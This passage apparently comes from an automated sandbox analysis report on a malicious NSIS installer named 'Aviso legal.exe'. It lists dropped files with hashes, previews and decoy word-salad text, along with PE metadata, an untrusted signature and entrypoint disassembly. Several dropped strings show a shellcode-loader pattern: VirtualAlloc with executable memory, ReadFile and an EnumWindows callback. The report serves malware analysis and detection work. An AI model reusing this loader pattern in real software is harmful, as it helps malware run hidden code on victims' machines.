Preview:	.1.......$......h..l.....\|C...J.<j..vF...c.........G.Q.........................=..D.......x.....^e..L...........wH$......7...C..../.....C..CT.A....2....3.f.........................q..a...h.......Q."....w...;......L....S..@b..z..I.........q..A.....................n.J.......................&...5.$..].f...y.....K.....B............h.\.............L.\|......<x......X..i.......Q.................\|.E..v..$R......G.c...6.#..sP.......H...........Y........l.<,. ........p....S..0.$....7.V.......... l...6...........D.....'..........V..............!U.........$.a..>.......u..SG...q..{+......x....q9..y..8..=.......N...........,.Z[.........O.....Psp.......,.....x..............Q.....j.....*m.....................0.....M..."........./g.'.................w......d.......6..f.m..A.<M.,......;........,....N.e\......\........\|......5p"...&....g.....$.....p..m.%+...S....o....@....d.......J....LH....t...K.......fT....B......>.F....2t.........Hzr..F.I...\......2(........l..........&..#.l.....4...

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\stopcocks.uns

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	3887
Entropy (8bit):	4.916542368312967
Encrypted:	false
SSDEEP:	96:ZouYwQAzTQTRKfyovTlmgfRPg101L2uTYxk:ZDlTQT0TPNYk
MD5:	462C5590A716548FA229D546C6BB94A9
SHA1:	7BD3C711C70797841BC5410D76935E55B3F0550C
SHA-256:	85D36884D0EF6A606604A19741EC4BC57005D328C6AA1F6C8E2DABB86D66216E
SHA-512:	EB07E696421E7E566A58695968FF79E71953AEB95064EAD505B9FD557AACEF4F5E97C17DB46A2933B2E8269B43B6B380A8A7B747C5F6B2351E588BB473EC8081
Malicious:	false
Preview:	......63............`VSw......P........g..B\|......`...ddr......a.............................V.......v..~v.......J............d....Z.A.........2..8.k........n....Q....6.8K.w.....\|=.2..V........T......\|.2%.............................e...G.............i....).............T...p..........t........8Z]...n...........f..P.J...X............\...[....PT.u...D.0..T.G................Pn...F.l.{.A.b..:.........>v.......L.......E..X.....T......x.......N........Lw...........%..6............?..........A..#...=....}.< ..}.......p........W{.AU......v>......;.'.@^....\|...h......................N..A...#....,7..L.....O.....6.....R........<....kB.........\|....Fs.........R&M.8..................U....+I...j...................0.......i......-......'.h...........J..v....w....O...F.o......^.9.......................T..........Z.....-......J.^!......R........d...........?.....O........g...e..............\|..i.....[I.bw.....................3.........7....~.......N.....-..1/...n..j?..<g......-....#..

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\trstegningerne.txt

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with very long lines (331), with no line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	4.2631934244817185
Encrypted:	false
SSDEEP:	6:uAIFWxlKGzpBfgJtDi+arecCh7L1mQqVMVeKAoF3+uhNMSqLIR8OFRLUAP+:uGaGLGBal7J4eKAoFJM7I2qJU9
MD5:	F23E5726FF94C1301BD5E32F3A384C3E
SHA1:	BE012A7A0E997F13FFA5AD5308EF79D1516457C3
SHA-256:	F6F91C19DFFD7364E76C6CA987933CA9E376E3923455EA1CE5AD34BA23F38BE3
SHA-512:	2E7F46E6483C7AD322EC25CB25FB43B11AB0B7251A4977D32BBE067E4238119CA2188F5E0546525F580906335AAA1F3F62E426332CE8DFA0B1CFC9E7F739862E
Malicious:	false
Preview:	autoerotic embolectomies stridendes instinctive olietankbekendtgrelses.skrubhvlede fonly torsoes brugergrnseflades kedlen slag.renpris spacecrafts cheerio plasmology tvangsruterne informalize,interprovincial briketteringerne heglingen boogies daabsattests archicytula.unpenned microcosmography teaterstykke.exploitage menace konks,

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\audifon.bul

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	4778
Entropy (8bit):	4.9444746463548395
Encrypted:	false
SSDEEP:	96:QwmJdGj23rzlbBg4rB/sZGk1b6YiiBwsCTuP377ed8/C7G1:QwAUs5N/Tk1b6Iw43Wd8/C7G1
MD5:	28034ACE2355FFFC34BC9E04BE013F82
SHA1:	6F4DFAFAD03DB531FA1F1D2BB1E1DBAEB2DB834A
SHA-256:	54D6568B778AD41428D64C10224FEF7D0E10E9933B9B7E37525291DE1A29D7D1
SHA-512:	13829D45F74364752E207F44B8AD80037C0C247523DAEB6A29660F74B39692757064B8EDB353E2ABFC78F132401E4388E749F123FE40F1A27650501E84FC07D8
Malicious:	false
Preview:	..F....=........CH.V....S.........\|...........q.....`. .........}..._.<.......h...yw......q.........\...Z......0..........n.}...h@)...............C.6.T.......g......1..L........Q....-+L....".a....^.......&..........................{.2.h.V........c........P........?p")......k....(...b....}.......#C.J.....J.^...........D5.....-.............jH.........Jf..Y...............n..!.@.w...........}...B.....".p.fK}.........=.k....3...!..........Cz.........{......{.........o.....m.....U.........W....8:..s.1.I.t........\|..D..y.....A...%.......ln.....m....L....#.....W...KW.q.t...C....'...._.....'.-.......]..2..5c.A....P......l...~.W....v...........r!7.Y....54...<....^.B..gN..._....J...............B......B...........................T.I::...E.............7......6`................G...*...A.....8...Q.........Tc....S...-.e.....e....o.%.4.k...........o....\|...O.P..z0......>......A.........[.4...H...4.....I.........P`.w...j......?W0=.f............6....!.7........2..m.......}.O@6...=W....

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\bisecting.ove

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	3058
Entropy (8bit):	4.867985240125452
Encrypted:	false
SSDEEP:	48:HBKUYIf22stTn+B4PWJRjnDj443qlGh1HnQmMP/RkjlyElrY7Ysc5v/sxSpzJoDQ:HoUXf2hn+BLb/j44+GrHojUYEsIvpVMQ
MD5:	D90BE3D6F13E5C07EF0E73E87BE8C414
SHA1:	A660A630B8786513BC8474C2FEEE0C5A8EAA5F36
SHA-256:	F7167DE10D85A53381DD593BACA7763F8D5E354E36790D090183CAF76A69AF0A
SHA-512:	3C957815684E6E39215E250AEA04637DD8CCDC0CBBC6962C83D717AC7F3CCAA61FA510EC2E9C95F106E4954CAF28936C20EB12C52AC986E0FDDBA8D05B88F661
Malicious:	false
Preview:	...........l..5.2.........\Q...O.....................y..U...........7...n.".......^...Y.........L..........k...........x.....:w.....*......@\|.........\.......a.................f.........'\..X.D......E>.......'..`......\..............&..S....J........X.E..i............08...'..J.........O..........0.A.`3........+......r...8...,j0............F............w.g=.}..jn)V....Ab\|.W......._.H...=~o..m.../.R...v..>T...........@v........k.d..............:............lc..<.....O....b........b........&t......q..7..K.+.p.........$..;.....)f...r..'.G'..........$.N........@...................^...d....2..]...k.r.c&....-............b.-.."W........g..>.V.F.....F.......i......#................................a.H.L........H......m..........4..O...~...Q..B...h......F..........l....}.....\_5........x......,...T...p.5.........T........................a+v.(...Rzw...,..oW.r....p......o....Q..........<1.....`.........h........I.....S.....Z..................... ..[.`w...u............1..........>.....

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\bricklayings.non

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	4423
Entropy (8bit):	4.949270542878988
Encrypted:	false
SSDEEP:	96:zL/Ix9oqXYZ74DMge7/pnsCj7LP1OBLde4kxd3BdeLQ:z0n3XYZ74wg+1U7sdwQ
MD5:	B186E4CFD624F52C189CC24BDB396D8A
SHA1:	45F714FFE18E6B5C8FFE9A89FC5AA79210CF8E6B
SHA-256:	5E38990F303EFD9B1441FC30FAC0283DF4210F2DF44B6BFD035DC08A7C1714A4
SHA-512:	7B3B68277F2C930B4E9E99233DB6C6B391972FF17007609F85B5F69564278B0CCCA5D4277D69BBA3953C2653133A61EE0FDF16F4C49B20EBA1FDF3359E04ADCA
Malicious:	false
Preview:	...y...M6....!4.w..8......*A..@........`.U..r.....0....l...`......n..k..A......".........E..X.$.k..................M..6.=......l.z..n.......:...n...........ra.Bj)...A.......&.......................I......9.......7..g......t.......W.Z.4).@9............q.n...&.M.............D....Z..?......p............ .....%.8.s...:.....\|.............._..d.C../....M..?..............S.Q_...................w....`#......[.................@....9.f.x.....;..j.......................o..O...........Z.....F...1L%......y............u.Y.............'..[..W.................H.Y...+.1...........C...-...7..@...y..T.....................#.).......c.........,.Y.h......r....sK.....v.....J.3E....$..!.!.......;.c....~.....#0.........q..U.....>./0.......v...v...y.Z..P......2...f...A>....(..........3.A+......q.O...x..y......J..v..D........ {...kA...K.d.....^.......2q....B.m...?l.[.......E........b$....3..%B.....r............V..p....S......P.......o........k....J..D...O..T..2.......r.F...vg..S.Y...:.......\.....

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\cardiographs.uop

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	4892
Entropy (8bit):	4.895010256290898
Encrypted:	false
SSDEEP:	96:VPthYc6b6NH3BEPHywchTFqK2GYdXR074ibaY5smmt735M0gR:HhKbQXKPH6Zq3dq74w1IpY
MD5:	F6A285726B14A1ACE757153A1CF12B5B
SHA1:	B8569BD93B142BC1A0F24BE9E7BB28434DB3873A
SHA-256:	2B3A8EF4AEA23CCBF84F43C765EF57F2DCF22F2D1B74F1228BB50CA675392062
SHA-512:	505D95401633E7CEFFC208F588219BF10812861871EDFA4F53562E3058B82D11AA07E9A64EB88F1D148BCAF8E5A8A109A320CA80323516D0F6F0E3D19CAEAA07
Malicious:	false
Preview:	....._1.......n.>........v........F^...............e..{.............%........&...-..............g...cd..z.............?.............6..T....d..F....r....$9.........r................G..A......4.....}.............\|......".0$......)Qo..t.......q.......~.................2...............J.g.........[......et....c............IC.......4Nk....?.........f.../.....aB..L..0.....b.O...Y.......E....z%f......p.........../..........s>.F......W......._.9......L....a.{...Kk..n..;..Y...A........e........s..............]8../7........X................h.@.........4........'b>...G../..2....6........d....F..P.W...........].J.._.........5z....V...............%=h,..u......z.............oqT............:.....v...#...X.J)Eb............j."..............L..G.........\m....l..-.......G...)e.....'a..A...].....2....2.O...8...\.....Z.................f...x.$...........N....h..........p..x...............S..........%..o...... .........T.....Z..k....Q.......(6...]^.........L........4.............#....{D.W........b

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\concubinage.ind

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	3615
Entropy (8bit):	4.781717113533645
Encrypted:	false
SSDEEP:	48:fY3eTl0lNjDAiMeKMRyDQyJDxlm2fUFNJLQYyEA1KVMAd7EDlLLTj3mVXotkgv7:w3eyt7cDlFlf2JQcRxdYBbttPv7
MD5:	451F7B3BC2501AFDFDD0B5AF1E3706F9
SHA1:	7CBAFB7CEBCBD0A10D3B32A8A01D68390E5E24B9
SHA-256:	165FD704517A414C5579286871CE6717BEE64908B3DAD07802AFD2EE81371BB8
SHA-512:	E051168098EDA4D96188B34E82060AC195C03D061DEC2A798EBC0C78D783564FB49CCF7E154235EC9D24664CBFC120594B515D50E738808328ADCA984A33DB6B
Malicious:	false
Preview:	..P.2..........................;.........................s.........w..\|........i.1.......UZ(_..G.......pQ.........RQ.................f......}.....%....N.....:.........R....3......J.......%........z..X...(..........t...,...\..Oh08..+..!..5.........V....!.....<.K.B/........3......_........7.....s.S.../......5..A.f....m..........e.9s..>.{....u...;vb...)D.........p........u.....+.d........7.$!.A......f............o..~...x....q.[.M...u....W...W..P..p............[.......................<....a.........../...........................d....H...\|.....>.......'..S._.g..U.....!....z..............h.......JV...........L....4....#....hV......1..../..2........[....#.....o...v.A....F....n..........g...s.............-.Q....................:._...=......'4......_.....r.$.W...-.......U!...\.........@......i..[....M.'.Z.X.....k..................^............Yg...j.....".\....BK......."5}......l".....................b...q..GG.............5....E.......F..u....i......T....}..........d&.........x

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\fritnkeri.els

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	3672
Entropy (8bit):	4.97616940802998
Encrypted:	false
SSDEEP:	48:xFS79alozLFOVJpXsZHdigJOuiNA4G+stAqo3/neCXLsiEzvwY7Fw5fiTjjpPQD:xY79GVaHdjEA4GJ89XQS8Xp+
MD5:	EEDA9DA1B55D1D2B24EADF3AAB92C34C
SHA1:	855DD4C049A987BB5801F201953F777067DCDEDB
SHA-256:	2F90A5F2F6BF58DC153B44DC2879CBEF1C78DE3891D9B3E6EEA9BF2A6B588376
SHA-512:	2ABA51EF997943679FC2E48DF582F04BDDCB91AF48E9C83100D194B0B367D03440FE7A9E822DB8A55FC8897E5F3B0BEE151E60261D33D88B77140AF2551BA282
Malicious:	false
Preview:	....Y.........................\|...b..............._.V..z..6..........F........6....c........o..J...e..y/...5..w.+.&.....4.........\C.o.......J.c.....n.p...f....p...L..........((.............@......p..h.(...1...H.?...........................qZ......q.%..s....K.p....}.......c........a..0...0.........m..B(a.........~...:...~.A....H;....!@.....k..]...........~............I...........................s......C.......t..+..A@K.}...\.......l..9....h............ S.=...e...0......ye...........k.....]...........}.f...f....................+.......Z....k.....3..~................x........)....8................\|.......d....S.L..J...+.4x...F...A..............^..@.......}G...[.:....K....]....../.C.....<.....l..A..5..W.k%X..2..............D...7.....^...'............f............9.sH......>.m....v.........Y....d.Nm..k.............."....0..........+-....l.............0......0....{..t...b.......SZ..i......3.......y......c[&[....NG.8m...'.........W.....#.......q..7J!.w}...f...........*;..........

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\maskningerne.aft

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	2641
Entropy (8bit):	4.912370258732604
Encrypted:	false
SSDEEP:	48:+M4x/IiuH84UKlQlzNROyeCFA6t5CXPTfLXKK+BHGUD5c:+M4x/IiiUJlzleCC6bqPuHGUD5c
MD5:	CF17370F08735B5C4A7ED26B0563463F
SHA1:	D7EDF15F524BC780F626A84A43CF352BD7216AEF
SHA-256:	15759A8E0FC11F64C4B2F23602B8748664313F421B8D766D3CB9AEFFB74DD7B9
SHA-512:	0C63D7695F04E7AED64EF2346C2CDC8E49BD9BFE52875DE27F35B677A7FD63C555E935EE09128AE9EBF2152F253ADEC72848AE7F8C17B67E8C14B3B36D6CC816
Malicious:	false
Preview:	,........n...SX..............k.......)......@...c..n..Q........J.r.........$....`...u.O....w................A................).....$.............V.......k.......2.......+..4..........E..E.........................&.....0...l.....g.;..l....>.t.1................C.........d.....s..x..q......6.....6..2.......G...i."......(.....%.....V..q....Z..".......... %..m..K=..4.w...........J...N.....................f..o...........5.V.............Z........\..............1aT....#.p.....c...r..............<.Bv....E............e.l.........S.7......KiW..... ...........'...-...^....\........."......%...v..OoJ.............:................o#"..+.t............4....1.........5.p.............A...`.....F...%....r.#..._j.......O..... ............L..l.....H.-.%.U_.B......y....}.....<......(....@........U.........................!........Z.z....to....q...8.................E...........r..,.h...........m.P.`.-..PU{...~.8.........X.'..........S.b...@..\|...........o.......D.....K.....^^..b............

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\atriumerne.eli

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	2067
Entropy (8bit):	4.965244696425312
Encrypted:	false
SSDEEP:	24:HnfGRZfBdLl/b/CmvGHbgs/k7Lqc/IsiYuGghgfaZTMvj61a6SJks+2bU207PNWu:/GRZfDRDTr6NIkfdGj6tdeTyWhYWXn4B
MD5:	DF7943BFD11E14F049F4BD3D91DECD2B
SHA1:	13DBFC7E14CB175310AA3F4840A7D6D3B3C8CE14
SHA-256:	97EC7C704B6F51EA3BAFB10FDB0EA5E75C1A2C32939434956DEC192AB23EEC03
SHA-512:	07A13D183798AF38D683F1B2C465B0AE98A530713EE05328194ACDC408A9643A889F009A9CF840C658F5B06D57EAF91C40B490CFF0B49CA5707F592E315C3C86
Malicious:	false
Preview:	.........^.}P..O........O.n. ...W_............."g".....I..}.....a.Z.=... ....{..B.....gG...o.........{.......5............{......~..@..........{...([RL....m.............{m......1.....,..........2N-..\......................6.......1.........T....4....y.A.......}............o..B.........._.....R.Dp.N*....^.....xQ...........3....<...q.....V.....&.`.I........... 4&\...Qc......~.......9....s2......N.....[..........y............G....................}.h....q..K.........B8.F.........t....kv..fF..b........S...D...... %2...K<....W....>5.........8...........r.....X..v.Z..................#.....T.M....d..................8...C.]................t...J....5"...5.[.'...-......w..]......#.........._....z9.L.^...5....................]Y.....!......:........95..Bi6...._.].8.............................4M...&......h.'/0...e...;.....C...#yx.N.....L/..}..\.......FuF?......<....X....n....#$.......T.o....J.....{#...)...<3..........KB..................H.....v....R.....q.......q..._.......{....]z..7........

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\sexualizing.Tro144

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	92253
Entropy (8bit):	4.596041951543385
Encrypted:	false
SSDEEP:	1536:DVE3+5YGgIGS185zYsJhwGIrJrxUn9Pb9a1vzEpxDP8a7af:C3+5ZgzYsU7bUn9D0cJEa7af
MD5:	DF166856C7BBD30800ED9DB7A4A9EC6D
SHA1:	C5ECB8B843D5C0B4BB245B940358A299C50A2D13
SHA-256:	A38112A083EE7B2AE0B7DD3C3FEA1F5AF44D9C93708E0C19F88DFC708898E560
SHA-512:	78629B41D26EA80E91C042E27C63489DCB6D2A7253F01A9AB69742E58829ECFBC08A7DF9AE396DC50D4240FF98D79F1FC94DE5F971BCAC3194A40FEA4327525D
Malicious:	false
Preview:	..qqq.P.i.V................R...........................dd._..............P.........~~~.'...........'.........i........zz............''..............PP...q..............c........h..hh.......f..D..........;........J.>>.CC.......................ZZZZ.@@@.........#......nn...........WW......................QQQ................B..8................#......I........................(....x....<<<<<.....................................k..o.....l....................H....++.Q..K..........===.......................JJ.....................B.....P.........{{{{..AAA.......''...............F....[............$....\|.RRRR.....55........................g...+.......I......v..NNN...................((((..........hh....u.N.............O...............................uu............/.1...rr.......ll.................f.........]......p..........=..ll...!!..D........K...........n.....88888.(((....................L.......1.J........ww.........................................7...KK.HH..........j........................t.

C:\Users\user\AppData\Local\Temp\nsbA808.tmp

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	3.9637832956585757
Encrypted:	false
SSDEEP:	3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
MD5:	16D513397F3C1F8334E8F3E4FC49828F
SHA1:	4EE15AFCA81CA6A13AF4E38240099B730D6931F0
SHA-256:	D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
SHA-512:	4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
Malicious:	false
Preview:	kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MSK203.exe, Detection: malicious, Browse Filename: MSK203.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe, Detection: malicious, Browse Filename: 61pzTJKVJX.exe, Detection: malicious, Browse Filename: 990009371653-Q095605-0-TB727985.exe, Detection: malicious, Browse Filename: Structure description-Rev.00.exe, Detection: malicious, Browse Filename: #Ubcf5#Uc0ac#Ubcf8 NDS24000012-2-Rev.0.exe, Detection: malicious, Browse Filename: RFQ-NVW-Norsok-EQPT REQS-Rev.00.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nshAAE8.tmp

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0914493934217315
Encrypted:	false
SSDEEP:	3:sBa99k1NoCFOn:KankVg
MD5:	5D04A35D3950677049C7A0CF17E37125
SHA1:	CAFDD49A953864F83D387774B39B2657A253470F
SHA-256:	A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
SHA-512:	C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
Malicious:	false
Preview:	kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

C:\Users\user\AppData\Local\Temp\nspAFED.tmp

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.256564762130954
Encrypted:	false
SSDEEP:	3:DyWgLQIfLBJXmgU:mkIP25
MD5:	F15BFDEBB2DF02D02C8491BDE1B4E9BD
SHA1:	93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
SHA-256:	C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
SHA-512:	1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
Malicious:	false
Preview:	user32::EnumWindows(i r1 ,i 0)

C:\Users\user\AppData\Local\Temp\nssACAE.tmp

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.543716429911504
Encrypted:	false
SSDEEP:	3:sEMBQEJkJVEji6J2vdWxQoXUn:/6AWxvUn
MD5:	2D45B071BCE5847E12B6308C981E1AB7
SHA1:	5BC8E983895ACD8ED0D5BB4FC48355CF5871ED2C
SHA-256:	3E9039677F7626A652276F60ECB67B20CD004050AF6D7CEC32D237591254CB81
SHA-512:	E838C8C079A8CA453EAA5509DF7FE8340329AFBF6E6205938EBCAC23A98514B7465E8AB7CC9E1BE1AF10423AB87C8F1797013B58DFFCC3D29A35A792D8F05EBC
Malicious:	false
Preview:	kernel32::VirtualAlloc(i 0,i 68571136, i 0x3000, i 0x40)p.r1

C:\Users\user\AppData\Local\Temp\nstAE84.tmp

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.250903860294566
Encrypted:	false
SSDEEP:	3:sAAEVvjs8S6JA84n:fLXS6U
MD5:	C599D20101D8532A39FEFBEC3A4162A9
SHA1:	6215D1ABF9002230448221E1EBDCB2916DF29CB3
SHA-256:	DB2D57C0D52D8989DE271B0B5440E043C7C93B4F58092DE80A1C1E569F5327B2
SHA-512:	DF32094A64597C11D96B2844EA097C960CF39901508DCDF9D0892E2879706D2B6A178D1F798A1BA22613091C79B11BA468B21AD04F7856C8BE3CFD517330DF93
Malicious:	false
Preview:	kernel32::ReadFile(i r5, i r1, i 68571136,*i 0, i 0)i.r3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	5.653105824231968
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Aviso legal.exe
File size:	841'240 bytes
MD5:	c7ae7bfda7f71b76c6f3213cfe94529e
SHA1:	eebcb778056a8fa9a33255141d70ffac41523caf
SHA256:	93b75e7f99768d86cb26282a3164d806d36a2c890fb7d367f0cf389a75d304d4
SHA512:	70326a8b9f6c7d99f82e32f0116b23e2b879bbea3235b03e7510a080ffbbeabc2620b09be4406a2a2b28b62c0679a3ee56e39b7398991693c80da0d84fe43fd2
SSDEEP:	12288:8bBFvUojlMVWIhWL7Uc8Eh8xn8mWpXS0iNrmY:8bPvUohIWIhko9xnVWpCH
TLSH:	4F05E1C2B18014A6E9744F3958365C8726B77D7DFCB0B81E6996F0A65B7B2E3102BC07
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	0401250109010d0c

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Dictating@Neals.Tel, O=Trapper, OU="Upaataltes Proterothesis Toothcup ", CN=Trapper, L=Bevington, S=Iowa, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	14/08/2023 11:41:16 13/08/2026 11:41:16
Subject Chain	E=Dictating@Neals.Tel, O=Trapper, OU="Upaataltes Proterothesis Toothcup ", CN=Trapper, L=Bevington, S=Iowa, C=US
Version:	3
Thumbprint MD5:	11BC420115D8ACEACC5D6244ABF4373D
Thumbprint SHA-1:	8AB6E862ACF364220D20DC9B3B751F722332D317
Thumbprint SHA-256:	7324B8CF0875F2DD6EA0F7AEBB1948BFF8D6582FCFD80B28C72C7C5B76198877
Serial:	06CB303D2313543B083B326C3429254DD90C4ADA

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F3C34B16D6Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F3C34B16D3Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x59000	0x64ea8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcc1f0	0x1428
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
